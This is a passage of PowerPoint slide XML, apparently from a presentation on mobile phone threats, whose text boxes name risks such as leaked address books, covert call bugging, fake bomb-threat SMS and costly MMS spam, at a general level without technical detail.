        <p:nvSpPr>
          <p:cNvPr id="20" name="Circular Arrow 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71DD9DD-5E96-432A-9D42-CD695158BDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5782061" y="3228203"/>
            <a:ext cx="610773" cy="531246"/>
          </a:xfrm>
          <a:prstGeom prst="circularArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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2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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Circular Arrow 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42DBD881-26BB-4F50-98CB-3A31DFC2992F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5782061" y="3432528"/>
            <a:ext cx="610773" cy="531246"/>
          </a:xfrm>
          <a:prstGeom prst="circularArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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2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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN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231EE3D0-310B-446F-8A5D-DCFA2F0BA29B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="386129" y="2001973"/>
            <a:ext cx="764860" cy="76506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609492">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty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0A7874F0-4D24-41EA-9285-C05D17804175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="386129" y="4411761"/>
            <a:ext cx="764860" cy="765060"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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609492">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty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B7A3D7FA-3F59-4F93-A92D-182E57BDD08D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11041012" y="4399941"/>
            <a:ext cx="764860" cy="765060"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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609492">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty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A1471B4E-7C25-4D0E-82C8-DE61D8EB09C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11041012" y="1995746"/>
            <a:ext cx="764860" cy="765060"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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609492">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty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70179487-83AE-4281-91CA-8268988610C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165852" y="1741593"/>
            <a:ext cx="3725095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Leakage of Calendars and Address Books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816A4CF-4F93-4966-9AB3-E28B9A9711B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165852" y="2365909"/>
            <a:ext cx="2921358" cy="877163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Attacker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can steal a user's personal information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and use it for malicious purposes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D175B222-66C3-41F9-B01C-D25E4647C49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8552295" y="1864594"/>
            <a:ext cx="2462940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Bugging Devices</a:t>
            </a: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DA27B567-2C72-48D6-ABE5-F71CC66BDBAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7898746" y="2204646"/>
            <a:ext cx="3116489" cy="1400383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Attacker could instruct the user to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make a phone call to other phones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without any user interaction; they could even record the user’s conversation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49E5852B-18C1-4036-9990-6F7FB02206DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165852" y="4213085"/>
            <a:ext cx="2829814" cy="3693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Sending SMS Messages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5364991E-F33B-4745-A89B-6F3D7A488EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165852" y="4559301"/>
            <a:ext cx="2921358" cy="877163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Terrorists could send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false bomb threats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to airlines using the phones of legitimate users</a:t>
            </a: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9B986CCD-1292-4CD8-81C8-1B1A7B776144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627305" y="4213085"/>
            <a:ext cx="3387930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Causing Financial Losses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6B236AC5-8455-4CF0-BA03-E6BEEF4A5EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7937928" y="4559301"/>
            <a:ext cx="3077307" cy="1138773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Hackers could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send many MMS messages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with an international user's phone, thus resulting in a high phone bill</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Freeform 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBBB2608-08DA-4731-AF20-B5CC2CF9F9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415" y="2227878"/>
            <a:ext cx="316312" cy="316315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 399 w 444"/>
              <a:gd name="T1" fmla="*/ 53 h 444"/>
              <a:gd name="T2" fmla="*/ 399 w 444"/>
              <a:gd name="T3" fmla="*/ 53 h 444"/>
              <a:gd name="T4" fmla="*/ 372 w 444"/>
              <a:gd name="T5" fmla="*/ 53 h 444"/>
              <a:gd name="T6" fmla="*/ 372 w 444"/>
              <a:gd name="T7" fmla="*/ 98 h 444"/>
              <a:gd name="T8" fmla="*/ 293 w 444"/>
              <a:gd name="T9" fmla="*/ 98 h 444"/>
              <a:gd name="T10" fmla="*/ 293 w 444"/>
              <a:gd name="T11" fmla="*/ 53 h 444"/>
              <a:gd name="T12" fmla="*/ 151 w 444"/>
              <a:gd name="T13" fmla="*/ 53 h 444"/>
              <a:gd name="T14" fmla="*/ 151 w 444"/>
              <a:gd name="T15" fmla="*/ 98 h 444"/>
              <a:gd name="T16" fmla="*/ 71 w 444"/>
              <a:gd name="T17" fmla="*/ 98 h 444"/>
              <a:gd name="T18" fmla="*/ 71 w 444"/>
              <a:gd name="T19" fmla="*/ 53 h 444"/>
              <a:gd name="T20" fmla="*/ 45 w 444"/>
              <a:gd name="T21" fmla="*/ 53 h 444"/>
              <a:gd name="T22" fmla="*/ 0 w 444"/>
              <a:gd name="T23" fmla="*/ 98 h 444"/>
              <a:gd name="T24" fmla="*/ 0 w 444"/>
              <a:gd name="T25" fmla="*/ 399 h 444"/>
              <a:gd name="T26" fmla="*/ 45 w 444"/>
              <a:gd name="T27" fmla="*/ 443 h 444"/>
              <a:gd name="T28" fmla="*/ 399 w 444"/>
              <a:gd name="T29" fmla="*/ 443 h 444"/>
              <a:gd name="T30" fmla="*/ 443 w 444"/>
              <a:gd name="T31" fmla="*/ 399 h 444"/>
              <a:gd name="T32" fmla="*/ 443 w 444"/>
              <a:gd name="T33" fmla="*/ 98 h 444"/>
              <a:gd name="T34" fmla="*/ 399 w 444"/>
              <a:gd name="T35" fmla="*/ 53 h 444"/>
              <a:gd name="T36" fmla="*/ 399 w 444"/>
              <a:gd name="T37" fmla="*/ 399 h 444"/>
              <a:gd name="T38" fmla="*/ 399 w 444"/>
              <a:gd name="T39" fmla="*/ 399 h 444"/>
              <a:gd name="T40" fmla="*/ 45 w 444"/>
              <a:gd name="T41" fmla="*/ 399 h 444"/>
              <a:gd name="T42" fmla="*/ 45 w 444"/>
              <a:gd name="T43" fmla="*/ 196 h 444"/>
              <a:gd name="T44" fmla="*/ 399 w 444"/>
              <a:gd name="T45" fmla="*/ 196 h 444"/>
              <a:gd name="T46" fmla="*/ 399 w 444"/>
              <a:gd name="T47" fmla="*/ 399 h 444"/>
              <a:gd name="T48" fmla="*/ 124 w 444"/>
              <a:gd name="T49" fmla="*/ 0 h 444"/>
              <a:gd name="T50" fmla="*/ 124 w 444"/>
              <a:gd name="T51" fmla="*/ 0 h 444"/>
              <a:gd name="T52" fmla="*/ 89 w 444"/>
              <a:gd name="T53" fmla="*/ 0 h 444"/>
              <a:gd name="T54" fmla="*/ 89 w 444"/>
              <a:gd name="T55" fmla="*/ 89 h 444"/>
              <a:gd name="T56" fmla="*/ 124 w 444"/>
              <a:gd name="T57" fmla="*/ 89 h 444"/>
              <a:gd name="T58" fmla="*/ 124 w 444"/>
              <a:gd name="T59" fmla="*/ 0 h 444"/>
              <a:gd name="T60" fmla="*/ 354 w 444"/>
              <a:gd name="T61" fmla="*/ 0 h 444"/>
              <a:gd name="T62" fmla="*/ 354 w 444"/>
              <a:gd name="T63" fmla="*/ 0 h 444"/>
              <a:gd name="T64" fmla="*/ 319 w 444"/>
              <a:gd name="T65" fmla="*/ 0 h 444"/>
              <a:gd name="T66" fmla="*/ 319 w 444"/>
              <a:gd name="T67" fmla="*/ 89 h 444"/>
              <a:gd name="T68" fmla="*/ 354 w 444"/>
              <a:gd name="T69" fmla="*/ 89 h 444"/>
              <a:gd name="T70" fmla="*/ 354 w 444"/>
              <a:gd name="T71" fmla="*/ 0 h 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44" h="444">
                <a:moveTo>
                  <a:pt x="399" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="53"/>
                  <a:pt x="372" y="53"/>
                  <a:pt x="372" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="98"/>
                  <a:pt x="372" y="98"/>
                  <a:pt x="372" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="98"/>
                  <a:pt x="293" y="98"/>
                  <a:pt x="293" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="53"/>
                  <a:pt x="293" y="53"/>
                  <a:pt x="293" y="53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151" y="98"/>
                  <a:pt x="151" y="98"/>
                  <a:pt x="151" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="98"/>
                  <a:pt x="71" y="98"/>
                  <a:pt x="71" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="53"/>
                  <a:pt x="71" y="53"/>
                  <a:pt x="71" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                  <a:pt x="45" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="53"/>
                  <a:pt x="0" y="71"/>
                  <a:pt x="0" y="98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5"/>
                  <a:pt x="18" y="443"/>
                  <a:pt x="45" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="443"/>
                  <a:pt x="399" y="443"/>
                  <a:pt x="399" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="425" y="443"/>
                  <a:pt x="443" y="425"/>
                  <a:pt x="443" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="443" y="98"/>
                  <a:pt x="443" y="98"/>
                  <a:pt x="443" y="98"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="443" y="71"/>
                  <a:pt x="425" y="53"/>
                  <a:pt x="399" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="399" y="399"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="399" y="399"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="399"/>
                  <a:pt x="45" y="399"/>
                  <a:pt x="45" y="399"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="196"/>
                  <a:pt x="45" y="196"/>
                  <a:pt x="45" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="196"/>
                  <a:pt x="399" y="196"/>
                  <a:pt x="399" y="196"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="399" y="399"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="124" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="0"/>
                  <a:pt x="89" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="89"/>
                  <a:pt x="89" y="89"/>
                  <a:pt x="89" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="89"/>
                  <a:pt x="124" y="89"/>
                  <a:pt x="124" y="89"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="354" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="354" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="0"/>
                  <a:pt x="319" y="0"/>
                  <a:pt x="319" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="89"/>
                  <a:pt x="319" y="89"/>
                  <a:pt x="319" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="354" y="89"/>
                  <a:pt x="354" y="89"/>
                  <a:pt x="354" y="89"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35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xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas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914217"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Lato Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D259D63-A3D0-4B11-B169-C5E61B76BC8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="585856" y="4597195"/>
            <a:ext cx="402125" cy="363209"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 382511 w 252"/>
              <a:gd name="T1" fmla="*/ 229537 h 244"/>
              <a:gd name="T2" fmla="*/ 376136 w 252"/>
              <a:gd name="T3" fmla="*/ 229537 h 244"/>
              <a:gd name="T4" fmla="*/ 369761 w 252"/>
              <a:gd name="T5" fmla="*/ 229537 h 244"/>
              <a:gd name="T6" fmla="*/ 369761 w 252"/>
              <a:gd name="T7" fmla="*/ 261417 h 244"/>
              <a:gd name="T8" fmla="*/ 369761 w 252"/>
              <a:gd name="T9" fmla="*/ 264605 h 244"/>
              <a:gd name="T10" fmla="*/ 368167 w 252"/>
              <a:gd name="T11" fmla="*/ 267793 h 244"/>
              <a:gd name="T12" fmla="*/ 368167 w 252"/>
              <a:gd name="T13" fmla="*/ 269387 h 244"/>
              <a:gd name="T14" fmla="*/ 366573 w 252"/>
              <a:gd name="T15" fmla="*/ 270981 h 244"/>
              <a:gd name="T16" fmla="*/ 366573 w 252"/>
              <a:gd name="T17" fmla="*/ 272575 h 244"/>
              <a:gd name="T18" fmla="*/ 364980 w 252"/>
              <a:gd name="T19" fmla="*/ 274169 h 244"/>
              <a:gd name="T20" fmla="*/ 363386 w 252"/>
              <a:gd name="T21" fmla="*/ 274169 h 244"/>
              <a:gd name="T22" fmla="*/ 350635 w 252"/>
              <a:gd name="T23" fmla="*/ 280545 h 244"/>
              <a:gd name="T24" fmla="*/ 350635 w 252"/>
              <a:gd name="T25" fmla="*/ 280545 h 244"/>
              <a:gd name="T26" fmla="*/ 337885 w 252"/>
              <a:gd name="T27" fmla="*/ 274169 h 244"/>
              <a:gd name="T28" fmla="*/ 291665 w 252"/>
              <a:gd name="T29" fmla="*/ 229537 h 244"/>
              <a:gd name="T30" fmla="*/ 290071 w 252"/>
              <a:gd name="T31" fmla="*/ 229537 h 244"/>
              <a:gd name="T32" fmla="*/ 114753 w 252"/>
              <a:gd name="T33" fmla="*/ 229537 h 244"/>
              <a:gd name="T34" fmla="*/ 95628 w 252"/>
              <a:gd name="T35" fmla="*/ 210409 h 244"/>
              <a:gd name="T36" fmla="*/ 95628 w 252"/>
              <a:gd name="T37" fmla="*/ 19128 h 244"/>
              <a:gd name="T38" fmla="*/ 114753 w 252"/>
              <a:gd name="T39" fmla="*/ 0 h 244"/>
              <a:gd name="T40" fmla="*/ 382511 w 252"/>
              <a:gd name="T41" fmla="*/ 0 h 244"/>
              <a:gd name="T42" fmla="*/ 401637 w 252"/>
              <a:gd name="T43" fmla="*/ 19128 h 244"/>
              <a:gd name="T44" fmla="*/ 401637 w 252"/>
              <a:gd name="T45" fmla="*/ 210409 h 244"/>
              <a:gd name="T46" fmla="*/ 382511 w 252"/>
              <a:gd name="T47" fmla="*/ 229537 h 244"/>
              <a:gd name="T48" fmla="*/ 283696 w 252"/>
              <a:gd name="T49" fmla="*/ 248665 h 244"/>
              <a:gd name="T50" fmla="*/ 323541 w 252"/>
              <a:gd name="T51" fmla="*/ 288515 h 244"/>
              <a:gd name="T52" fmla="*/ 323541 w 252"/>
              <a:gd name="T53" fmla="*/ 288515 h 244"/>
              <a:gd name="T54" fmla="*/ 350635 w 252"/>
              <a:gd name="T55" fmla="*/ 299674 h 244"/>
              <a:gd name="T56" fmla="*/ 350635 w 252"/>
              <a:gd name="T57" fmla="*/ 312426 h 244"/>
              <a:gd name="T58" fmla="*/ 331510 w 252"/>
              <a:gd name="T59" fmla="*/ 331554 h 244"/>
              <a:gd name="T60" fmla="*/ 197631 w 252"/>
              <a:gd name="T61" fmla="*/ 331554 h 244"/>
              <a:gd name="T62" fmla="*/ 153005 w 252"/>
              <a:gd name="T63" fmla="*/ 331554 h 244"/>
              <a:gd name="T64" fmla="*/ 133879 w 252"/>
              <a:gd name="T65" fmla="*/ 331554 h 244"/>
              <a:gd name="T66" fmla="*/ 129098 w 252"/>
              <a:gd name="T67" fmla="*/ 331554 h 244"/>
              <a:gd name="T68" fmla="*/ 76502 w 252"/>
              <a:gd name="T69" fmla="*/ 382562 h 244"/>
              <a:gd name="T70" fmla="*/ 63752 w 252"/>
              <a:gd name="T71" fmla="*/ 388938 h 244"/>
              <a:gd name="T72" fmla="*/ 63752 w 252"/>
              <a:gd name="T73" fmla="*/ 388938 h 244"/>
              <a:gd name="T74" fmla="*/ 51002 w 252"/>
              <a:gd name="T75" fmla="*/ 382562 h 244"/>
              <a:gd name="T76" fmla="*/ 49408 w 252"/>
              <a:gd name="T77" fmla="*/ 382562 h 244"/>
              <a:gd name="T78" fmla="*/ 47814 w 252"/>
              <a:gd name="T79" fmla="*/ 380968 h 244"/>
              <a:gd name="T80" fmla="*/ 47814 w 252"/>
              <a:gd name="T81" fmla="*/ 379374 h 244"/>
              <a:gd name="T82" fmla="*/ 46220 w 252"/>
              <a:gd name="T83" fmla="*/ 377780 h 244"/>
              <a:gd name="T84" fmla="*/ 46220 w 252"/>
              <a:gd name="T85" fmla="*/ 376186 h 244"/>
              <a:gd name="T86" fmla="*/ 44626 w 252"/>
              <a:gd name="T87" fmla="*/ 372998 h 244"/>
              <a:gd name="T88" fmla="*/ 44626 w 252"/>
              <a:gd name="T89" fmla="*/ 369810 h 244"/>
              <a:gd name="T90" fmla="*/ 44626 w 252"/>
              <a:gd name="T91" fmla="*/ 331554 h 244"/>
              <a:gd name="T92" fmla="*/ 41439 w 252"/>
              <a:gd name="T93" fmla="*/ 331554 h 244"/>
              <a:gd name="T94" fmla="*/ 19126 w 252"/>
              <a:gd name="T95" fmla="*/ 331554 h 244"/>
              <a:gd name="T96" fmla="*/ 0 w 252"/>
              <a:gd name="T97" fmla="*/ 312426 h 244"/>
              <a:gd name="T98" fmla="*/ 0 w 252"/>
              <a:gd name="T99" fmla="*/ 95640 h 244"/>
              <a:gd name="T100" fmla="*/ 19126 w 252"/>
              <a:gd name="T101" fmla="*/ 76512 h 244"/>
              <a:gd name="T102" fmla="*/ 76502 w 252"/>
              <a:gd name="T103" fmla="*/ 76512 h 244"/>
              <a:gd name="T104" fmla="*/ 76502 w 252"/>
              <a:gd name="T105" fmla="*/ 210409 h 244"/>
              <a:gd name="T106" fmla="*/ 114753 w 252"/>
              <a:gd name="T107" fmla="*/ 248665 h 244"/>
              <a:gd name="T108" fmla="*/ 283696 w 252"/>
              <a:gd name="T109" fmla="*/ 248665 h 244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52" h="244">
                <a:moveTo>
                  <a:pt x="240" y="144"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="236" y="144"/>
                  <a:pt x="236" y="144"/>
                  <a:pt x="236" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="144"/>
                  <a:pt x="232" y="144"/>
                  <a:pt x="232" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="164"/>
                  <a:pt x="232" y="164"/>
                  <a:pt x="232" y="164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="165"/>
                  <a:pt x="232" y="166"/>
                  <a:pt x="232" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="167"/>
                  <a:pt x="231" y="167"/>
                  <a:pt x="231" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="168"/>
                  <a:pt x="231" y="168"/>
                  <a:pt x="231" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="169"/>
                  <a:pt x="231" y="170"/>
                  <a:pt x="230" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="230" y="170"/>
                  <a:pt x="230" y="170"/>
                  <a:pt x="230" y="171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="230" y="171"/>
                  <a:pt x="229" y="172"/>
                  <a:pt x="229" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="172"/>
                  <a:pt x="229" y="172"/>
                  <a:pt x="228" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="226" y="175"/>
                  <a:pt x="223" y="176"/>
                  <a:pt x="220" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="176"/>
                  <a:pt x="220" y="176"/>
                  <a:pt x="220" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="217" y="176"/>
                  <a:pt x="214" y="175"/>
                  <a:pt x="212" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="144"/>
                  <a:pt x="183" y="144"/>
                  <a:pt x="183" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182" y="144"/>
                  <a:pt x="182" y="144"/>
                  <a:pt x="182" y="144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65" y="144"/>
                  <a:pt x="60" y="139"/>
                  <a:pt x="60" y="132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240" y="0"/>
                  <a:pt x="240" y="0"/>
                  <a:pt x="240" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="247" y="0"/>
                  <a:pt x="252" y="5"/>
                  <a:pt x="252" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="132"/>
                  <a:pt x="252" y="132"/>
                  <a:pt x="252" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="139"/>
                  <a:pt x="247" y="144"/>
                  <a:pt x="240" y="144"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="178" y="156"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="203" y="181"/>
                  <a:pt x="203" y="181"/>
                  <a:pt x="203" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203" y="181"/>
                  <a:pt x="203" y="181"/>
                  <a:pt x="203" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="208" y="185"/>
                  <a:pt x="214" y="188"/>
                  <a:pt x="220" y="188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="196"/>
                  <a:pt x="220" y="196"/>
                  <a:pt x="220" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="203"/>
                  <a:pt x="215" y="208"/>
                  <a:pt x="208" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="208"/>
                  <a:pt x="124" y="208"/>
                  <a:pt x="124" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="208"/>
                  <a:pt x="96" y="208"/>
                  <a:pt x="96" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="208"/>
                  <a:pt x="84" y="208"/>
                  <a:pt x="84" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81" y="208"/>
                  <a:pt x="81" y="208"/>
                  <a:pt x="81" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="240"/>
                  <a:pt x="48" y="240"/>
                  <a:pt x="48" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="243"/>
                  <a:pt x="43" y="244"/>
                  <a:pt x="40" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="244"/>
                  <a:pt x="40" y="244"/>
                  <a:pt x="40" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="244"/>
                  <a:pt x="34" y="243"/>
                  <a:pt x="32" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="240"/>
                  <a:pt x="31" y="240"/>
                  <a:pt x="31" y="240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="240"/>
                  <a:pt x="30" y="239"/>
                  <a:pt x="30" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="238"/>
                  <a:pt x="30" y="238"/>
                  <a:pt x="30" y="238"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="238"/>
                  <a:pt x="29" y="237"/>
                  <a:pt x="29" y="237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="236"/>
                  <a:pt x="29" y="236"/>
                  <a:pt x="29" y="236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="235"/>
                  <a:pt x="28" y="235"/>
                  <a:pt x="28" y="234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="234"/>
                  <a:pt x="28" y="233"/>
                  <a:pt x="28" y="232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="208"/>
                  <a:pt x="28" y="208"/>
                  <a:pt x="28" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="208"/>
                  <a:pt x="26" y="208"/>
                  <a:pt x="26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3"/>
                  <a:pt x="5" y="48"/>
                  <a:pt x="12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132"/>
                  <a:pt x="48" y="132"/>
                  <a:pt x="48" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="145"/>
                  <a:pt x="59" y="156"/>
                  <a:pt x="72" y="156"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="178" y="1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59" name="Freeform 16">
            <a:extLst>
